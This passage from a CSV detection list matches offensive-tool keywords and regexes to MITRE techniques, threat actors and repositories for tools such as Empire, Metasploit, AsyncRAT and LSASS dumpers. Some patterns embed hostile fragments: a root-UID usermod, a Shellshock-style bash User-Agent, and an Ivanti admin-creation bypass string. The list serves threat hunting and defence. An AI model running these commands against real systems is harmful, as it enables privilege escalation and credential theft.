- T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62003" "*usemodule operation/file/put_file*",".{0,1000}usemodule\soperation\/file\/put_file.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","62004" "*usemodule persistence/*",".{0,1000}usemodule\spersistence\/.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","62005" "*usemodule powershell/persistence*",".{0,1000}usemodule\spowershell\/persistence.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","62006" "*usemodule privesc/*",".{0,1000}usemodule\sprivesc\/.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","62007" "*useplugin csharpserver*",".{0,1000}useplugin\scsharpserver.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - 
T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62008" "*UsePrtAdminAccount*",".{0,1000}UsePrtAdminAccount.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","62009" "*UsePrtImperonsationAccount*",".{0,1000}UsePrtImperonsationAccount.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). 
It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","62010" "*user aborted during DBMS fingerprint.*",".{0,1000}user\saborted\sduring\sDBMS\sfingerprint\..{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","62011" "*user Inveigh*",".{0,1000}user\sInveigh.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","62012" "*--user orbitaldump*",".{0,1000}\-\-user\sorbitaldump.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tool","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","N/A","5","460","83","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z","62013" "*user_eq_pass_valid_cme_*.txt*",".{0,1000}user_eq_pass_valid_cme_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active 
Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62015" "*--user_file*--password_file*",".{0,1000}\-\-user_file.{0,1000}\-\-password_file.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","62016" "*user_password.rb*",".{0,1000}user_password\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62017" "*user_to_secretsdump.py*",".{0,1000}user_to_secretsdump\.py.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","62018" "*user|username|login|pass|password|pw|credentials*",".{0,1000}user\|username\|login\|pass\|password\|pw\|credentials.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","62019" "*USER=!!ABSENT!!*OPERATION=adduser*MODGROUP=admin*",".{0,1000}USER\=!!ABSENT!!.{0,1000}OPERATION\=adduser.{0,1000}MODGROUP\=admin.{0,1000}","offensive_tool_keyword","POC","Ivanti Authent Bypass CVE-2024-7593 - Successful exploitation could lead to authentication bypass and creation of an administrator user","T1078 - T1136 - T1078.001","TA0006 - TA0004 - TA0005","N/A","N/A","Credential 
Access","https://x.com/mthcht/status/1823463842459848906","1","0","N/A","in ivanti vtm audit logs","10","10","N/A","N/A","N/A","N/A","62020" "*UserAgent = ""Rubeus/1.0""*",".{0,1000}UserAgent\s\=\s\""Rubeus\/1\.0\"".{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","62023" "*User-Agent*NIKMOK*",".{0,1000}User\-Agent.{0,1000}NIKMOK.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","user agent NIKMOK observed in AsyncRAT sample","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","Asyncrat - Redline","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","Malware","https://x.com/g0njxa/status/1829177645348860120","1","0","#useragent","https://www.virustotal.com/gui/file/810791ccd63225a766dd580e0e83d502df14172812fb912997e6a844bc9d7f6c/","9","10","N/A","N/A","N/A","N/A","62024" "*useragent*OWASP Amass*",".{0,1000}useragent.{0,1000}OWASP\sAmass.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","","N/A","","","","62025" "*user-agent*OWASP Amass*",".{0,1000}user\-agent.{0,1000}OWASP\sAmass.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER 
BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","","N/A","","","","62026" "*User-Agent: *echo; echo; /bin/bash -c *",".{0,1000}User\-Agent\:\s.{0,1000}echo\;\secho\;\s\/bin\/bash\s\-c\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux #useragent","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","62028" "*'User-Agent: alex666'*",".{0,1000}\'User\-Agent\:\salex666\'.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21985 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#useragent","N/A","7","10","N/A","N/A","N/A","N/A","62029" "*'User-Agent: attacker'*",".{0,1000}\'User\-Agent\:\sattacker\'.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21985 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/sknux/CVE-2021-21985_PoC","1","0","#useragent","N/A","7","1","3","1","2021-11-09T19:14:55Z","2021-11-09T19:06:29Z","62030" "*User-Agent: JustKidding*",".{0,1000}User\-Agent\:\sJustKidding.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - 
TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#useragent","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","62031" "*'User-Agent': 'JustKidding'*",".{0,1000}\'User\-Agent\'\:\s\'JustKidding\'.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#useragent","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","62032" "*User-Agent: pproxy-*",".{0,1000}User\-Agent\:\spproxy\-.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","62033" "*'User-Agent':'CanisRufus'*",".{0,1000}\'User\-Agent\'\:\'CanisRufus\'.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","#useragent","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","62034" "*--user-data-dir=C:\\chrome-dev-profile23 
--remote-debugging-port=9222*",".{0,1000}\-\-user\-data\-dir\=C\:\\\\chrome\-dev\-profile23\s\-\-remote\-debugging\-port\=9222.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","62035" "*userenum-password-timing*",".{0,1000}userenum\-password\-timing.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","0","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","62036" "*UserHunterImplant*",".{0,1000}UserHunterImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","62037" "*usermod -u 0 -o *",".{0,1000}usermod\s\-u\s0\s\-o\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","62039" "*Username to use for ADWS Connection. Format: domain\\user or user@domain*",".{0,1000}Username\sto\suse\sfor\sADWS\sConnection\.\sFormat\:\sdomain\\\\user\sor\suser\@domain.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","62040" "*username-anarchy *",".{0,1000}username\-anarchy\s.{0,1000}","offensive_tool_keyword","username-anarchy","Tools for generating usernames when penetration testing. 
Usernames are half the password brute force problem.","T1110 - T1134 - T1078","TA0006","N/A","Black Basta","Credential Access","https://github.com/urbanadventurer/username-anarchy","1","0","N/A","N/A","N/A","10","1000","140","2024-09-20T01:57:59Z","2012-11-07T05:35:10Z","62041" "*UsernameAsPasswordCreds.txt*",".{0,1000}UsernameAsPasswordCreds\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","62042" "*userpass_cme_check*",".{0,1000}userpass_cme_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62043" "*userpass_kerbrute_check*",".{0,1000}userpass_kerbrute_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62044" "*UserPassBruteForce*",".{0,1000}UserPassBruteForce.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - 
TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","62045" "*UserRightsUtil.exe -m enum*",".{0,1000}UserRightsUtil\.exe\s\-m\senum.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","62046" "*users/public/troubleshooting_log.log*",".{0,1000}users\/public\/troubleshooting_log\.log.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","62047" "*users\\public\\elevationstation.js*",".{0,1000}users\\\\public\\\\elevationstation\.js.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","62048" "*Users\\Public\\lsass.dmp*",".{0,1000}Users\\\\Public\\\\lsass\.dmp.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","#content","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","62049" "*Users\\Public\\panda.sense*",".{0,1000}Users\\\\Public\\\\panda\.sense.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","62050" "*users\\usethis\\NewFile.txt*",".{0,1000}users\\\\usethis\\\\NewFile\.txt.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
